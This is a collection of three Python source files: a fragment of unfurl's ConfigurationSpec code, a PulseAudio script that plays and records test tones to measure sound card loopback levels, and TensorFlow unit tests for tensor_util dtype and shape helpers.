if "className" not in kw:
return _set_classname(kw, artifact, inputs)
return kw
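# Illustrative sketch (not part of the unfurl source; the configurator class name and
# inputs below are assumptions chosen for demonstration): because ConfigurationSpec is
# standalone and easily serializable, a spec can be built directly and specialized
# with copy(). This helper is never called by unfurl itself.
def _example_configuration_spec():
    spec = ConfigurationSpec(
        "configure",
        "Standard.configure",
        className="unfurl.configurators.shell.ShellConfigurator",
        inputs={"command": "echo hello"},
    )
    # derive a variant that runs under the "discover" workflow instead of the default
    return spec.copy(workflow="discover")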
|
the-stack_106_16989
|
import configparser
import numpy as np
import os
import subprocess
import time
from scipy.io import wavfile
CFG_FILE = os.path.join(os.environ['HOME'], 'soundcard.cfg')
WAV_FILE_OUT = '/tmp/out.wav'
WAV_FILE_IN = '/tmp/in.wav'
SAMPLE_RATE = 44100
BIT_DEPTH = np.int16
WAV_FORMAT = 's16ne'
VOL_PLAY = 2 ** 16 - 1
DURATION_RECORD = 2
PAUSE_PRE_PLAY = 2
PAUSE_PRE_RECORD = 2
PAUSE_POST_RECORD = 2
DURATION_PLAY = DURATION_RECORD + PAUSE_PRE_RECORD + PAUSE_POST_RECORD
config = configparser.ConfigParser()
config.read(CFG_FILE)
PA_SINK = config.get('SOUNDCARD', 'PA_SINK', fallback='')
PA_SOURCE = config.get('SOUNDCARD', 'PA_SOURCE', fallback='')
VOL_RECORD = config.getint('SOUNDCARD', 'VOL_RECORD', fallback=-1)
if PA_SINK == '' or PA_SOURCE == '' or VOL_RECORD == -1:
config['SOUNDCARD'] = {'PA_SINK': PA_SINK, 'PA_SOURCE': PA_SOURCE, 'VOL_RECORD': VOL_RECORD}
with open(CFG_FILE, 'w') as cfg:
config.write(cfg)
if PA_SINK == '' or PA_SOURCE == '':
raise ValueError(f'PA_SINK or PA_SOURCE are not set! Specify PulseAudio devices in {CFG_FILE}')
def sine_wave(frequency=440):
time_points = np.linspace(0, DURATION_PLAY, SAMPLE_RATE * DURATION_PLAY)
return np.iinfo(BIT_DEPTH).max * np.sin(frequency * 2 * np.pi * time_points)
def white_noise():
return np.random.uniform(np.iinfo(BIT_DEPTH).min, np.iinfo(BIT_DEPTH).max, SAMPLE_RATE * DURATION_PLAY)
def is_waveform_clipped(waveform):
clipped_top = np.max(waveform) >= np.iinfo(BIT_DEPTH).max
clipped_bottom = np.min(waveform) <= np.iinfo(BIT_DEPTH).min
return clipped_top or clipped_bottom
def write_waveform(waveform):
if os.path.exists(WAV_FILE_OUT):
os.remove(WAV_FILE_OUT)
    # duplicate the mono waveform into two columns so the file is written as two-channel audio
    wavfile.write(WAV_FILE_OUT, SAMPLE_RATE, np.column_stack((waveform, waveform)).astype(BIT_DEPTH))
def play_wav():
subprocess.Popen(['pacmd', 'set-sink-volume', PA_SINK, '0'])
subprocess.Popen(['pacmd', 'set-sink-volume', PA_SINK, f'{int(VOL_PLAY)}'])
subprocess.Popen(['paplay', WAV_FILE_OUT, f'--device={PA_SINK}'])
def record_wav():
if VOL_RECORD == -1:
raise ValueError('VOL_RECORD parameter is not set! Use gain_tune.py to configure recording gain')
if os.path.exists(WAV_FILE_IN):
os.remove(WAV_FILE_IN)
subprocess.Popen(['pacmd', 'set-source-volume', PA_SOURCE, '0'])
subprocess.Popen(['pacmd', 'set-source-volume', PA_SOURCE, f'{int(VOL_RECORD)}'])
subprocess.Popen(
[
'parecord',
f'--device={PA_SOURCE}',
f'--rate={SAMPLE_RATE}',
f'--format={WAV_FORMAT}',
'--channels=2',
f'--process-time-msec={DURATION_RECORD*1000}',
WAV_FILE_IN,
]
)
def read_waveform():
_, waveform = wavfile.read(WAV_FILE_IN)
return waveform
def play_and_record(waveform):
write_waveform(waveform)
time.sleep(PAUSE_PRE_PLAY)
play_wav()
time.sleep(PAUSE_PRE_RECORD)
record_wav()
time.sleep(DURATION_RECORD)
subprocess.Popen(['pkill', 'parecord'])
time.sleep(PAUSE_POST_RECORD)
new_waveform = read_waveform()
subprocess.Popen(['pkill', 'paplay'])
if is_waveform_clipped(new_waveform):
raise ValueError('Recorded waveform is clipped - reduce VOL_RECORD parameter')
new_waveform_L = new_waveform.astype('int')[:, 0]
new_waveform_R = new_waveform.astype('int')[:, 1]
return new_waveform_L, new_waveform_R
def rms(waveform):
return np.sqrt(np.mean(np.square(waveform)))
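# Illustrative driver sketch (not part of the original script; the 1 kHz test tone is
# an assumption): play a tone through PA_SINK, record the loopback from PA_SOURCE,
# and report the per-channel RMS level of the capture.
if __name__ == '__main__':
    left, right = play_and_record(sine_wave(1000))
    print(f'loopback RMS: L={rms(left):.1f} R={rms(right):.1f}')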
|
the-stack_106_16990
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""tensor_util tests."""
# pylint: disable=unused-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import numpy as np
import tensorflow as tf
class FloatDTypeTest(tf.test.TestCase):
def test_assert_same_float_dtype(self):
self.assertIs(
tf.float32, tf.contrib.framework.assert_same_float_dtype(None, None))
self.assertIs(
tf.float32, tf.contrib.framework.assert_same_float_dtype([], None))
self.assertIs(
tf.float32,
tf.contrib.framework.assert_same_float_dtype([], tf.float32))
self.assertIs(
tf.float32,
tf.contrib.framework.assert_same_float_dtype(None, tf.float32))
self.assertIs(
tf.float32,
tf.contrib.framework.assert_same_float_dtype([None, None], None))
self.assertIs(
tf.float32,
tf.contrib.framework.assert_same_float_dtype([None, None], tf.float32))
const_float = tf.constant(3.0, dtype=tf.float32)
self.assertIs(
tf.float32,
tf.contrib.framework.assert_same_float_dtype([const_float], tf.float32))
self.assertRaises(
ValueError,
tf.contrib.framework.assert_same_float_dtype, [const_float], tf.int32)
sparse_float = tf.SparseTensor(
tf.constant([[111], [232]], tf.int64),
tf.constant([23.4, -43.2], tf.float32),
tf.constant([500], tf.int64))
self.assertIs(tf.float32, tf.contrib.framework.assert_same_float_dtype(
[sparse_float], tf.float32))
self.assertRaises(
ValueError,
tf.contrib.framework.assert_same_float_dtype, [sparse_float], tf.int32)
self.assertRaises(
ValueError, tf.contrib.framework.assert_same_float_dtype,
[const_float, None, sparse_float], tf.float64)
self.assertIs(
tf.float32,
tf.contrib.framework.assert_same_float_dtype(
[const_float, sparse_float]))
self.assertIs(tf.float32, tf.contrib.framework.assert_same_float_dtype(
[const_float, sparse_float], tf.float32))
const_int = tf.constant(3, dtype=tf.int32)
self.assertRaises(ValueError, tf.contrib.framework.assert_same_float_dtype,
[sparse_float, const_int])
self.assertRaises(ValueError, tf.contrib.framework.assert_same_float_dtype,
[sparse_float, const_int], tf.int32)
self.assertRaises(ValueError, tf.contrib.framework.assert_same_float_dtype,
[sparse_float, const_int], tf.float32)
self.assertRaises(
ValueError, tf.contrib.framework.assert_same_float_dtype, [const_int])
class AssertScalarIntTest(tf.test.TestCase):
def test_assert_scalar_int(self):
tf.contrib.framework.assert_scalar_int(tf.constant(3, dtype=tf.int32))
tf.contrib.framework.assert_scalar_int(tf.constant(3, dtype=tf.int64))
with self.assertRaisesRegexp(ValueError, "Unexpected type"):
tf.contrib.framework.assert_scalar_int(tf.constant(3, dtype=tf.float32))
with self.assertRaisesRegexp(ValueError, "Unexpected shape"):
tf.contrib.framework.assert_scalar_int(
tf.constant([3, 4], dtype=tf.int32))
class LocalVariabletest(tf.test.TestCase):
def test_local_variable(self):
with self.test_session() as sess:
self.assertEquals([], tf.local_variables())
value0 = 42
tf.contrib.framework.local_variable(value0)
value1 = 43
tf.contrib.framework.local_variable(value1)
variables = tf.local_variables()
self.assertEquals(2, len(variables))
self.assertRaises(tf.OpError, sess.run, variables)
tf.initialize_variables(variables).run()
self.assertAllEqual(set([value0, value1]), set(sess.run(variables)))
class ReduceSumNTest(tf.test.TestCase):
def test_reduce_sum_n(self):
with self.test_session():
a = tf.constant(1)
b = tf.constant([2])
c = tf.constant([[3, 4], [5, 6]])
self.assertEqual(21, tf.contrib.framework.reduce_sum_n([a, b, c]).eval())
class WithShapeTest(tf.test.TestCase):
def _assert_with_shape(
self, tensor, expected_value, expected_shape, unexpected_shapes):
for unexpected_shape in unexpected_shapes:
self.assertRaises(
ValueError, tf.contrib.framework.with_shape, unexpected_shape, tensor)
pattern = (
r"\[Wrong shape for %s \[expected\] \[actual\].\] \[%s\] \[%s\]" %
(tensor.name,
" ".join([str(dim) for dim in unexpected_shape]),
" ".join([str(dim) for dim in expected_shape])))
self.assertRaisesRegexp(
tf.OpError,
re.compile(pattern),
tf.contrib.framework.with_shape(
tf.constant(unexpected_shape), tensor).eval)
expected_placeholder = tf.placeholder(tf.float32)
self.assertRaisesRegexp(
tf.OpError,
re.compile(pattern),
tf.contrib.framework.with_same_shape(
expected_placeholder, tensor).eval, {
expected_placeholder: np.ones(unexpected_shape)
})
self.assertIs(tensor, tf.contrib.framework.with_shape(
expected_shape, tensor))
self.assertIs(tensor, tf.contrib.framework.with_same_shape(
tf.constant(1, shape=expected_shape), tensor))
tensor_with_shape = tf.contrib.framework.with_shape(
tf.constant(expected_shape), tensor)
np.testing.assert_array_equal(expected_value, tensor_with_shape.eval())
tensor_with_same_shape = tf.contrib.framework.with_same_shape(
expected_placeholder, tensor)
np.testing.assert_array_equal(expected_value, tensor_with_same_shape.eval({
expected_placeholder: np.ones(expected_shape)
}))
def test_with_shape_invalid_expected_shape(self):
with self.test_session():
self.assertRaisesRegexp(
ValueError, "Invalid rank", tf.contrib.framework.with_shape,
[[1], [2]], tf.constant(1.0))
def test_with_shape_invalid_type(self):
with self.test_session():
self.assertRaisesRegexp(
ValueError, "Invalid dtype", tf.contrib.framework.with_shape,
[1.1], tf.constant([1.0]))
self.assertRaisesRegexp(
ValueError, "Invalid dtype", tf.contrib.framework.with_shape,
np.array([1.1]), tf.constant(1.0))
self.assertRaisesRegexp(
ValueError, "Invalid dtype", tf.contrib.framework.with_shape,
tf.constant(np.array([1.1])), tf.constant(1.0))
def test_with_shape_0(self):
with self.test_session():
value = 42
shape = [0]
unexpected_shapes = [[1], [2], [1, 1]]
self._assert_with_shape(
tf.constant(value, shape=shape), value, shape, unexpected_shapes)
def test_with_shape_1(self):
with self.test_session():
value = [42]
shape = [1]
unexpected_shapes = [[0], [2], [1, 1]]
self._assert_with_shape(
tf.constant(value, shape=shape), value, shape, unexpected_shapes)
def test_with_shape_2(self):
with self.test_session():
value = [42, 43]
shape = [2]
unexpected_shapes = [[0], [1], [2, 1]]
self._assert_with_shape(
tf.constant(value, shape=shape), value, shape, unexpected_shapes)
def test_with_shape_2x2(self):
with self.test_session():
value = [[42, 43], [44, 45]]
shape = [2, 2]
unexpected_shapes = [[0], [1], [2, 1]]
self._assert_with_shape(
tf.constant(value, shape=shape), value, shape, unexpected_shapes)
def test_with_shape_none(self):
with self.test_session():
tensor_no_shape = tf.placeholder(tf.float32)
compatible_shape = [2, 2]
with_present_2x2 = tf.contrib.framework.with_shape(
compatible_shape, tensor_no_shape)
self.assertEquals(compatible_shape, with_present_2x2.get_shape().dims)
with_future_2x2 = tf.contrib.framework.with_shape(
tf.constant(compatible_shape), tensor_no_shape)
array_2x2 = [[42.0, 43.0], [44.0, 45.0]]
for tensor_2x2 in [with_present_2x2, with_future_2x2]:
np.testing.assert_array_equal(
array_2x2, tensor_2x2.eval({tensor_no_shape: array_2x2}))
self.assertRaisesRegexp(
tf.OpError, "Wrong shape", tensor_2x2.eval,
{tensor_no_shape: [42.0, 43.0]})
self.assertRaisesRegexp(
tf.OpError, "Wrong shape", tensor_2x2.eval,
{tensor_no_shape: [42.0]})
def test_with_shape_partial(self):
with self.test_session():
tensor_partial_shape = tf.placeholder(tf.float32)
tensor_partial_shape.set_shape([None, 2])
for incompatible_shape in [[0], [1]]:
self.assertRaisesRegexp(
ValueError, r"Shapes \(\?, 2\) and \([01],\) are not compatible",
tf.contrib.framework.with_shape,
incompatible_shape, tensor_partial_shape)
for incompatible_shape in [[1, 2, 1]]:
self.assertRaisesRegexp(
ValueError, "Incompatible shapes", tf.contrib.framework.with_shape,
incompatible_shape, tensor_partial_shape)
for incompatible_shape in [[2, 1]]:
self.assertRaisesRegexp(
ValueError, r"Shapes \(\?, 2\) and \(2, 1\) are not compatible",
tf.contrib.framework.with_shape,
incompatible_shape, tensor_partial_shape)
compatible_shape = [2, 2]
with_present_2x2 = tf.contrib.framework.with_shape(
compatible_shape, tensor_partial_shape)
self.assertEquals(compatible_shape, with_present_2x2.get_shape().dims)
with_future_2x2 = tf.contrib.framework.with_shape(
tf.constant(compatible_shape), tensor_partial_shape)
array_2x2 = [[42.0, 43.0], [44.0, 45.0]]
for tensor_2x2 in [with_present_2x2, with_future_2x2]:
np.testing.assert_array_equal(
array_2x2, tensor_2x2.eval({tensor_partial_shape: array_2x2}))
self.assertRaises(
ValueError, tensor_2x2.eval, {tensor_partial_shape: [42.0, 43.0]})
self.assertRaises(
ValueError, tensor_2x2.eval, {tensor_partial_shape: [42.0]})
if __name__ == "__main__":
tf.test.main()
|